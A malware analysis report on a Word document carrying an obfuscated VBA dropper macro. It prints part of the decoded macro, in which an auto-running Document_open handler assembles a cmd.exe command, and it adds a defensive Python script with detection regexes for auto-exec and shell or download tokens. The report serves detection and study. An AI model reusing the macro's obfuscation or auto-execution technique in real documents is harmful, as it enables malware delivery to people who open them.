Verdict: MALICIOUS (risk score 222)

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1566.001 Phishing: Spearphishing Attachment
The sample carries VBA macros with a Document_Open auto-execution handler, and the analyzer flags a Shell() call in the macro code; together these indicate an attempt to run arbitrary commands as soon as the document is opened, most likely to fetch and execute a second-stage payload. The ClamAV signature Doc.Dropper.Agent-6612832-0 is consistent with that dropper role. The extracted source is heavily obfuscated: every procedure is padded with junk arithmetic over undeclared variables under On Error Resume Next, the Document_open handler invokes another macro (rcXdwIIMubi) through Application.Run with a command string assembled from a long chain of helper functions, and the one helper visible in the preview (AthTnC) builds its fragment from Chr() calls whose numeric constants (109, 99, 34) give "m", "c" and a double quote if the surrounding undeclared variables are Empty. Combined with the "c" contributed by CVar("c") on the Document_open line and the caret-escaped tokens "f^o^R" and "/^f", the string appears to spell out a cmd.exe "for /f" invocation. The rest of that command line, the body of rcXdwIIMubi and any download URL lie in the truncated part of the dump, so the second stage cannot be characterized further from this report.
Heuristics (6)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Dropper.Agent-6612832-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Dropper.Agent-6612832-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (3 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier rather than a network contact. |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 27712 bytes | 61288e3cea66d1f8b6f913f4017a7902a85f051c31591e65be8cb01edf005c84 |
Preview: first 1,000 lines of the extracted script (cut short in this report).

```vb
Attribute VB_Name = "cuHwBMZvwP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UBrzLnOXWFK()
JznFX = (OAAWw * fLQwZ / 16046 / UNnsFl) - 1648 + jdDsZ + titokZ / 41287 * (89771 / 38352 + TarTz / RdcwV)
UuLjQ = (XdLtG * RjlEH / 51603 / ESdhB) - 67015 + uzdztG + USGsrc / 80712 * (93479 / 41662 + UNqWI / JRQClu)
FiTWj = (XwiWpl * WJojba / 87614 / YfuhVf) - 22032 + PbFuN + GQCoMw / 32094 * (79788 / 7253 + iUdIp / WvFvjC)
fSqjG = (mHVhdf * zWnIj / 37211 / YRwvV) - 49495 + mkrWk + TimBD / 46571 * (85607 / 80986 + zUNUq / skOYqR)
KCLWOu = (qPiCYj * NwJjbt / 98061 / BDkWF) - 19825 + RHDrMd + ltbJR / 84341 * (9665 / 90230 + QMkiI / zbfqKA)
End Function
Function WwHIZGQPzArRza()
fTirnn = (GZOsX * wuXrw / 96311 / SiSPT) - 49611 + sDTQj + IdCUkG / 79205 * (28151 / 17072 + TwcYP / QfdLJJ)
kRJwU = (LGAWzP * mqFEQ / 50424 / qaphR) - 1942 + TTMOq + qtSkIV / 6029 * (54260 / 88881 + WPnioA / LWnXZJ)
TYNmP = (FwIhM * sCGpI / 7814 / PzTqB) - 72712 + nnnYj + cBAMsD / 98016 * (10635 / 16490 + nvLvj / ZnCFA)
zHnAER = (RVYdX * wMQaz / 19500 / QGrCi) - 90919 + oiJSd + EhGik / 87444 * (9938 / 80270 + nActNC / bqwQmN)
WKRqEK = (ZNAqC * PCFOR / 35957 / BrloPj) - 16910 + aCMbi + KsizlA / 75165 * (39860 / 70881 + BIObu / iNFrki)
AhMAz = (SKkAN * qCuwFF / 7006 / dfvqp) - 63999 + OzVaz + zzijCz / 79805 * (81023 / 20964 + uwEsK / rzAwiY)
End Function
Private Sub Document_open()
On Error Resume Next
QjZPk = (IYELw + wGnjr - (80071 - JPaMl + 68416 - BichFl * 65575 + JoozK - (31892 / uDhwHq / 91655 * 67521)))
lGTWGN = (wEIqV + IzGkZv - (64815 - FhElDE + 93250 - sLcWZV * 27084 + uTlSI - (85874 / UoCWUM / 75487 * 50072)))
zUlzp = (nfoBa + WFLfrz - (97848 - rfojVW + 59896 - cGFzrM * 15224 + wITUB - (38541 / PCwhb / 75118 * 53984)))
nTbtW = (stQUFw + IFbHd - (71445 - DanMEb + 15594 - rEdwq * 13925 + FCdTa - (14945 / rnJCd / 64957 * 60880)))
XUXwE = Application.Run("rcXdwIIMubi", "" + qdSfFdSozDiv + Kzuiidi + CVar("c") + JZdWpDAAHH + jplriAf + AthTnC + acPMEMLAIA + blwPFAiHsi + cdrbr + VTHfczFEb + VoKvi + jmGQDYWkOj + asmwM + mbIwbEjGIj + taCLzKV + zEcIDwJrJSp + wKUfSAu + uDMMjOovVk + rGHwlzYd)
plFTsE = (AISiz + mrUaif - (88991 - BaKQdz + 19411 - YbTFH * 9241 + isYYaK - (58279 / QJssuh / 89736 * 49831)))
rwjAD = (zadaj + EmuJZ - (76715 - YFXEfv + 4433 - fvfstN * 68675 + QdfLm - (94616 / HbflCV / 7805 * 54700)))
InKuCO = (uAjrK + bhPqhG - (13666 - RXwtG + 70696 - PSiBX * 49682 + RRjpJT - (62429 / vmFSR / 21212 * 59389)))
End Sub
Function pMrPOAwiwi()
BvqiF = (ptANG + ViHntU - (4031 - zRcjqT + 729 - rRjvAG * 72669 + HOviZp - (85254 / jAkio / 16558 * 25074)))
QQfaYh = (iTsfR + lmVtJi - (20068 - ZmZNi + 76011 - VMwJn * 42175 + sBrPjt - (48297 / vFNwvG / 78831 * 34265)))
tGnJG = (TOuYz + RlimN - (43247 - dADrvK + 60740 - XOzWlU * 35973 + VCnLv - (41566 / nMXEko / 10359 * 1047)))
qnRbQ = (GrwnmG + JooTvk - (53583 - hhNIB + 6902 - tfVBcq * 92684 + Apuhk - (41279 / CZknE / 24020 * 14857)))
TjBpOr = (aQvzuB + zzcIk - (51082 - sIUQf + 46713 - vzSOI * 62176 + nQSHK - (77970 / iZjsKL / 14441 * 71937)))
End Function
Attribute VB_Name = "EkTHnmN"
Function AthTnC()
On Error Resume Next
Tnzws = (FUEND + OzuQvV + XJHipL + jiNFwi * 70350 / oNXajp / 58486 - uCfWj - (pnKhia / LIJnM - (aHwOU - WJhsU)))
imdBTd = ipJUUJ - tLDvi / 20378 * vmQPK / GkqPwQ * DOVNdm - hToIKG - 42247 * NRuVv - nzNmJ
twtWER = (iqqRw + qbzIED + hWZUc + lQPIb * 38216 / vnVul / 13001 - GuXacY - (QMBEh / HAXZY - (jfwPiP - rkDGDW)))
ZrFurdLKqZG = CStr(Chr(AsTSZjwUonAIkn + zuwYZriEG + 109 + iCdolzz + sbBzoITlD)) + "d " + "/" + CStr(Chr(zJLQtpFaIN + WfTSLwOJ + 99 + wVVtwjQYsBr + VqMvvtWw)) + " f" + "^o^R ;" + " ; /^f" + " ; " + CStr(Chr(PiUUpHnoGkR + vAtVJkUNUrYwc + 34 + SPQhvrF + PbQFMkupKzR)) + " "
wMcKov = (oavREK + cEOnTR + DwnKN + lIvps * 52529 / FwjzwR / 71653 - jCzQwj - (cdhVlo / Qpz
```
... (truncated)
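The following is an added example, not code from the analyzer or from oletools: a standard-library-only Python triage that reproduces the rule behind the OLE_VBA_DOCOPEN and OLE_VBA_PCODE_AUTOEXEC_EXEC findings (an auto-execution entry point together with an execution-capable token) and then partially peels the obfuscation seen in the preview above. Its assumptions: the `SAMPLE` text is the Document_open handler and the AthTnC() helper copied from the preview; the undeclared identifiers summed inside each Chr() are Variant Empty, which VBA treats as 0 in arithmetic (the `On Error Resume Next` at the top of every procedure is what keeps the divisions by Empty elsewhere from aborting); and all regexes and function names are this example's own. Under those assumptions Chr(109), Chr(99) and Chr(34) resolve to "m", "c" and a double quote, and the helper's literal folds to `md /c f^o^R ; ; /^f ; "`, which with the "c" from CVar("c") on the calling line and the carets removed reads as `cmd /c for /f "` (cmd.exe treats semicolons as token delimiters).

```python
"""Static triage of an extracted VBA macro dump and partial Chr()/caret
deobfuscation.  Added example; not the analyzer's or oletools' code."""
import re

# Excerpt copied from the macros.bas preview in the report: the Document_open
# handler and the AthTnC() helper.  The rest of the dump is junk arithmetic.
SAMPLE = r'''Private Sub Document_open()
On Error Resume Next
XUXwE = Application.Run("rcXdwIIMubi", "" + qdSfFdSozDiv + Kzuiidi + CVar("c") + JZdWpDAAHH + jplriAf + AthTnC + acPMEMLAIA + blwPFAiHsi + cdrbr + VTHfczFEb + VoKvi + jmGQDYWkOj + asmwM + mbIwbEjGIj + taCLzKV + zEcIDwJrJSp + wKUfSAu + uDMMjOovVk + rGHwlzYd)
End Sub
Function AthTnC()
On Error Resume Next
ZrFurdLKqZG = CStr(Chr(AsTSZjwUonAIkn + zuwYZriEG + 109 + iCdolzz + sbBzoITlD)) + "d " + "/" + CStr(Chr(zJLQtpFaIN + WfTSLwOJ + 99 + wVVtwjQYsBr + VqMvvtWw)) + " f" + "^o^R ;" + " ; /^f" + " ; " + CStr(Chr(PiUUpHnoGkR + vAtVJkUNUrYwc + 34 + SPQhvrF + PbQFMkupKzR)) + " "
End Function
'''

# Auto-execution entry points and execution-capable tokens (this example's own lists).
AUTOEXEC = re.compile(r'\b(Document_Open|Document_Close|AutoOpen|Auto_Open|AutoExec|AutoClose|Workbook_Open)\b', re.I)
EXEC_TOKENS = re.compile(r'\b(Shell|Application\.Run|WScript\.Shell|CreateObject|ShellExecute|URLDownloadToFile|XMLHTTP|PowerShell)\b', re.I)


def triage(src):
    """Report entry points and execution tokens present in the source text, and
    whether both occur together (the rule the p-code heuristic applies)."""
    autoexec = sorted({m.group(1).lower() for m in AUTOEXEC.finditer(src)})
    tokens = sorted({m.group(1).lower() for m in EXEC_TOKENS.finditer(src)})
    return {"autoexec": autoexec, "exec_tokens": tokens,
            "autoexec_with_exec": bool(autoexec and tokens)}


def _eval_sum(expr):
    """Evaluate identifiers and integer literals joined by + / -.  Assumption:
    undeclared VBA variables are Variant Empty, i.e. 0 in arithmetic.  Returns
    None if any other operator appears, so nothing is guessed."""
    total, sign = 0, 1
    for tok in re.findall(r'\d+|[A-Za-z_]\w*|[+\-]|\S', expr):
        if tok == '+':
            sign = 1
        elif tok == '-':
            sign = -1
        elif tok.isdigit():
            total += sign * int(tok)
            sign = 1
        elif re.fullmatch(r'[A-Za-z_]\w*', tok):
            sign = 1  # Empty contributes 0
        else:
            return None
    return total


CHR_CALL = re.compile(r'CStr\(Chr\(([^()]*)\)\)|Chr\(([^()]*)\)', re.I)


def resolve_chr(src):
    """Rewrite Chr(<sum>) / CStr(Chr(<sum>)) as the VBA string literal for the
    resulting byte; calls that cannot be resolved are left as they are."""
    def repl(m):
        val = _eval_sum(m.group(1) if m.group(1) is not None else m.group(2))
        if val is None or not 0 <= val < 256:
            return m.group(0)
        return '"' + chr(val).replace('"', '""') + '"'   # "" escapes a quote in VBA
    return CHR_CALL.sub(repl, src)


LIT = r'"(?:[^"]|"")*"'                                   # one VBA string literal
FOLD = re.compile(r'(' + LIT + r')\s*[+&]\s*(' + LIT + r')')


def fold_literals(line):
    """Merge adjacent literals joined by + or & until the line stops changing."""
    while True:
        merged = FOLD.sub(lambda m: m.group(1)[:-1] + m.group(2)[1:], line)
        if merged == line:
            return line
        line = merged


def strip_carets(s):
    """Undo cmd.exe caret escaping: ^x -> x, so f^o^R -> foR and /^f -> /f."""
    return re.sub(r'\^(.)', r'\1', s)


def recover_strings(src):
    """Resolve Chr(), fold concatenations, and return every non-empty string
    literal in the dump (carets removed) in source order."""
    found = []
    for line in resolve_chr(src).splitlines():
        for lit in re.findall(LIT, fold_literals(line)):
            s = lit[1:-1].replace('""', '"')
            if s:
                found.append(strip_carets(s))
    return found


if __name__ == "__main__":
    print(triage(SAMPLE))
    for s in recover_strings(SAMPLE):
        print(repr(s))
```

This is string-level recovery, not emulation: the recovered fragment ends where the preview is cut, the Application.Run target rcXdwIIMubi is defined outside the shown lines, and the other helpers concatenated on the calling line may contribute further characters. Recovering the full command and any URL needs the complete macros.bas dump and a VBA emulator or sandbox run.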